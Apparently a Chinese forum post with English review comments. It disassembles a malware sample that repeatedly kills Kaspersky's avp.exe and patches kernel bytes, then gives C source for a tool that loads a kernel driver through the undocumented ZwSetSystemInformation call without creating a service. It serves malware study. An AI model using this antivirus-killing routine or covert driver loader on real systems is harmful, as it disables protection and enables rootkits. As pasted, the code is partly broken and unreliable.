OD代码:
0040130B |. 68 54304000 push 00403054 ; /Arg1 = 00403054 ASCII "avp.exe"
00401310 |. E8 4FFEFFFF call 00401164 ; /结束卡巴.00401164
00401315 |. A3 38304000 mov dword ptr [403038], eax
0040131A |. FF35 38304000 push dword ptr [403038] ; /ProcessId = 0
00401320 |. 6A 00 push 0 ; |Inheritable = FALSE
00401322 |. 6A 01 push 1 ; |Access = TERMINATE
00401324 |. E8 2B010000 call <jmp.&kernel32.OpenProcess> ; /OpenProcess
00401329 |. 8BD8 mov ebx, eax
0040132B |. 6A FF push -1 ; /ExitCode = FFFFFFFF (-1.)
0040132D |. 53 push ebx ; |hProcess
0040132E |. E8 3F010000 call <jmp.&kernel32.TerminateProcess> ; /TerminateProcess
00401333 |. 53 push ebx ; /hObject
00401334 |. E8 FD000000 call <jmp.&kernel32.CloseHandle> ; /CloseHandle
00401339 |. 68 C8000000 push 0C8 ; /Timeout = 200. ms
0040133E |. E8 29010000 call <jmp.&kernel32.Sleep> ; /Sleep
00401343 |. 68 5C304000 push 0040305C ; /Arg1 = 0040305C ASCII "avp.exe"
00401348 |. E8 17FEFFFF call 00401164 ; /结束卡巴.00401164
0040134D |. A3 38304000 mov dword ptr [403038], eax
00401352 |. FF35 38304000 push dword ptr [403038] ; /ProcessId = 0
00401358 |. 6A 00 push 0 ; |Inheritable = FALSE
0040135A |. 6A 01 push 1 ; |Access = TERMINATE
0040135C |. E8 F3000000 call <jmp.&kernel32.OpenProcess> ; /OpenProcess
00401361 |. 8BD8 mov ebx, eax
00401363 |. 6A FF push -1 ; /ExitCode = FFFFFFFF (-1.)
00401365 |. 53 push ebx ; |hProcess
00401366 |. E8 07010000 call <jmp.&kernel32.TerminateProcess> ; /TerminateProcess
0040136B |. 53 push ebx ; /hObject
0040136C |. E8 C5000000 call <jmp.&kernel32.CloseHandle> ; /CloseHandle
00401371 |. 68 C8000000 push 0C8 ; /Timeout = 200. ms
00401376 |. E8 F1000000 call <jmp.&kernel32.Sleep> ; /Sleep
0040137B |. 68 64304000 push 00403064 ; /Arg1 = 00403064 ASCII "avp.exe"
00401380 |. E8 DFFDFFFF call 00401164 ; /结束卡巴.00401164
00401385 |. A3 38304000 mov dword ptr [403038], eax
0040138A |. FF35 38304000 push dword ptr [403038] ; /ProcessId = 0
00401390 |. 6A 00 push 0 ; |Inheritable = FALSE
00401392 |. 6A 01 push 1 ; |Access = TERMINATE
00401394 |. E8 BB000000 call <jmp.&kernel32.OpenProcess> ; /OpenProcess
00401399 |. 8BD8 mov ebx, eax
0040139B |. 6A FF push -1 ; /ExitCode = FFFFFFFF (-1.)
0040139D |. 53 push ebx ; |hProcess
0040139E |. E8 CF000000 call <jmp.&kernel32.TerminateProcess> ; /TerminateProcess
004013A3 |. 53 push ebx ; /hObject
004013A4 |. E8 8D000000 call <jmp.&kernel32.CloseHandle> ; /CloseHandle
004013A9 |. 68 C8000000 push 0C8 ; /Timeout = 200. ms
004013AE |. E8 B9000000 call <jmp.&kernel32.Sleep> ; /Sleep
004013B3 |. 5F pop edi
004013B4 |. 5E pop esi
004013B5 |. 5B pop ebx
004013B6 /. C3 retn
; Program entry of the sample (OllyDbg listing). Read from an analyst's side, the
; sequence is: run "Call.dat" via WinExec, obtain a value from 0040123D and keep it
; at [403009], do a far call through the fword at [40303C] while on a borrowed stack,
; patch two bytes at fixed offsets from that value to 0EB, far-return to 004013F8,
; sleep 2 s, then call 00401308 three times and exit. What 0040123D returns and which
; code segment the far call selector names are not visible in this listing.
004013B7 >/$ 6A 01 push 1 ; /ShowState = SW_SHOWNORMAL
004013B9 |. 68 6C304000 push 0040306C ; |CmdLine = "Call.dat"
004013BE |. E8 C1000000 call <jmp.&kernel32.WinExec> ; /WinExec
; The page's prose says Call.dat is what loads the driver; this routine only launches it.
004013C3 |. E8 75FEFFFF call 0040123D
004013C8 |. 0BC0 or eax, eax
004013CA |. 74 62 je short 0040142E
; eax == 0 skips everything below and goes straight to ExitProcess.
004013CC |. A3 09304000 mov dword ptr [403009], eax
004013D1 |. FF1D 3C304000 call far fword ptr [40303C]
; Stack switch: the current esp is saved in eax, esp is replaced by the dword at
; [esp+4], and the saved value is pushed so it can be restored by the pop esp below.
004013D7 |. 8BC4 mov eax, esp
004013D9 |. 8B6424 04 mov esp, dword ptr [esp+4]
004013DD |. 50 push eax
004013DE |. A1 09304000 mov eax, dword ptr [403009]
; Two single-byte patches relative to the value from 0040123D. 0EB is the x86
; short-jmp opcode; presumably this rewrites conditional checks in the target
; image into unconditional jumps -- TODO confirm against the target's code.
004013E3 |. C680 B1B70100>mov byte ptr [eax+1B7B1], 0EB
004013EA |. C680 86CA0100>mov byte ptr [eax+1CA86], 0EB
004013F1 |. 5C pop esp
; Far return with a pushed return address: used as a far jump back to 004013F8
; (i.e. back to the original code segment).
004013F2 |. 68 F8134000 push 004013F8
004013F7 |. CB retf ; RET used as a jump to 004013F8
004013F8 |> 6A 00 push 0 ; /pModule = NULL
004013FA |. E8 4F000000 call <jmp.&kernel32.GetModuleHandleA> ; /GetModuleHandleA
004013FF |. A3 78304000 mov dword ptr [403078], eax
00401404 |. 68 D0070000 push 7D0 ; /Timeout = 2000. ms
00401409 |. E8 5E000000 call <jmp.&kernel32.Sleep> ; /Sleep
; 00401308 is presumably the routine listed above (OpenProcess/TerminateProcess on
; "avp.exe"); it is invoked three times in a row.
0040140E |. E8 F5FEFFFF call 00401308
00401413 |. E8 F0FEFFFF call 00401308
00401418 |. E8 EBFEFFFF call 00401308
; 00401000 receives the module handle plus three constants (0, 0, 0A); its body is
; not in this listing.
0040141D |. 6A 0A push 0A ; /Arg4 = 0000000A
0040141F |. 6A 00 push 0 ; |Arg3 = 00000000
00401421 |. 6A 00 push 0 ; |Arg2 = 00000000
00401423 |. FF35 78304000 push dword ptr [403078] ; |Arg1 = 00000000
00401429 |. E8 D2FBFFFF call 00401000 ; /结束卡巴.00401000
0040142E |> 6A 00 push 0 ; /ExitCode = 0
00401430 /. E8 0D000000 call <jmp.&kernel32.ExitProcess> ; /ExitProcess
而Call.dat通过ZwSetSystemInformation(这种方法用的不太多吧)加载驱动C:/MIGBOT.SYS
在邪八找到了一段代码,又学到东西了:
#include <windows.h>
#include <stdio.h>
// NOTE(review): NTSTATUS is typedef'd as unsigned long a few lines below, so the
// cast makes this comparison always true and the success/failure branch in
// main() cannot tell the two apart. The native NTSTATUS is a signed LONG.
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
// SYSTEM_INFORMATION_CLASS value handed to ZwSetSystemInformation() in main().
#define SystemLoadAndCallImage 38
// Local copy of the native UNICODE_STRING layout; Length/MaximumLength are byte
// counts and Buffer points at the (not necessarily NUL-terminated) characters.
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PVOID Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
typedef unsigned long NTSTATUS;
// Input structure for the SystemLoadAndCallImage class: just the image path.
typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;
// The three ntdll.dll routines are not linked statically; main() resolves each
// with GetProcAddress() into the globals declared here.
typedef DWORD (CALLBACK* ZWSETSYSTEMINFORMATION)(DWORD, PVOID, ULONG);
ZWSETSYSTEMINFORMATION ZwSetSystemInformation;
typedef DWORD (CALLBACK* RTLINITUNICODESTRING)(PUNICODE_STRING,PCWSTR );
RTLINITUNICODESTRING RtlInitUnicodeString;
typedef DWORD (CALLBACK* RTLANSISTRINGTOUNICODESTRING)(PVOID, PVOID,DWORD);
RTLANSISTRINGTOUNICODESTRING RtlAnsiStringToUnicodeString;
/*
 * Command-line tool: asks the kernel to load and call the image at argv[1]
 * through the undocumented ZwSetSystemInformation(SystemLoadAndCallImage)
 * information class. No service is created here (there is no
 * CreateService/StartService call), which is the property that makes this
 * path worth watching for on the defensive side.
 *
 * argv[1]  path of the driver image; converted to a full path and prefixed
 *          with the NT object namespace prefix.
 * Returns  true on the (always-taken, see NT_SUCCESS) "loaded" branch; exits
 *          with -1 on usage error and 1 when a ntdll export cannot be found.
 *
 * NOTE(review): every backslash in the string literals below appears to have
 * been turned into a forward slash by the paste ("/r/n", "//??//") -- the
 * listing as shown will not print or build the intended strings.
 */
int main(int argc, char *argv[])
{
SYSTEM_LOAD_AND_CALL_IMAGE GregsImage;
UNICODE_STRING TmpBuff;
char szDrvFullPath[256],szTmp[256];
int iBuffLen;
printf("Load driver with ZwSetSystemInformation( )/r/n");
printf("Date: 8th May 2007/r/n");
printf("Modifed by: GaRY <wofeiwo_at_gmail_dot_com>/r/n/r/n");
if(argc != 2 || stricmp(argv[1], "-h") ==0 || stricmp(argv[1], "-?") ==0 || stricmp(argv[1], "/?") ==0)
{
printf("Usage: %s <DriverPath>/r/n", argv[0]);
exit(-1);
}
// Resolve the functions from ntdll.dll at runtime.
if( !(RtlInitUnicodeString = (RTLINITUNICODESTRING) GetProcAddress( GetModuleHandle("ntdll.dll"), "RtlInitUnicodeString" )) )
{
printf( "GetProcAddress(/"RtlInitUnicodeString/") Error:%d/n", GetLastError() );
exit(1);
}
if( !(ZwSetSystemInformation = (ZWSETSYSTEMINFORMATION) GetProcAddress( GetModuleHandle("ntdll.dll"), "ZwSetSystemInformation" )) )
{
printf( "GetProcAddress(/"ZwSetSystemInformation/") Error:%d/n", GetLastError() );
exit(1);
}
// NOTE(review): the error text below names the wrong export (copy-paste from
// the previous block); this lookup is for RtlAnsiStringToUnicodeString.
if( !(RtlAnsiStringToUnicodeString = (RTLANSISTRINGTOUNICODESTRING) GetProcAddress( GetModuleHandle("ntdll.dll"), "RtlAnsiStringToUnicodeString" )) )
{
printf( "GetProcAddress(/"ZwSetSystemInformation/") Error:%d/n", GetLastError() );
exit(1);
}
// Return value (0 on failure, or the required size when szTmp is too small) is
// not checked, so an overlong or invalid argv[1] goes unnoticed here.
GetFullPathName(argv[1], 256, szTmp, NULL);
printf("Loading driver: %s/r/n", szTmp);
// NOTE(review): szTmp may hold up to 255 characters and the prefix adds six
// more, but szDrvFullPath is also only 256 bytes -- sprintf() can overrun it.
iBuffLen = sprintf(szDrvFullPath, "//??//%s", szTmp);
szDrvFullPath[iBuffLen]=0;
// TmpBuff is used with the ANSI_STRING layout (same field order as
// UNICODE_STRING); MaximumLength is never set and stays uninitialized.
TmpBuff.Buffer = (PVOID)szDrvFullPath;
TmpBuff.Length = iBuffLen;
// Third argument 1 presumably means "allocate the destination buffer"; that
// allocation is never released (no RtlFreeUnicodeString) -- verify.
RtlAnsiStringToUnicodeString(&(GregsImage.ModuleName),&TmpBuff,1);
// Load into kernel space. Because NTSTATUS is defined unsigned in this file,
// NT_SUCCESS() is always true and the else branch below is unreachable.
if( NT_SUCCESS( ZwSetSystemInformation( SystemLoadAndCallImage, &GregsImage, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)) ))
{
printf("Driver: %s loaded./r/n", szDrvFullPath);
}
else
{
printf("Driver: %s not loaded./r/n", szDrvFullPath);
}
// `true` is not a C keyword before C23 and <stdbool.h> is not included;
// presumably this was built as C++ -- confirm.
return true;
}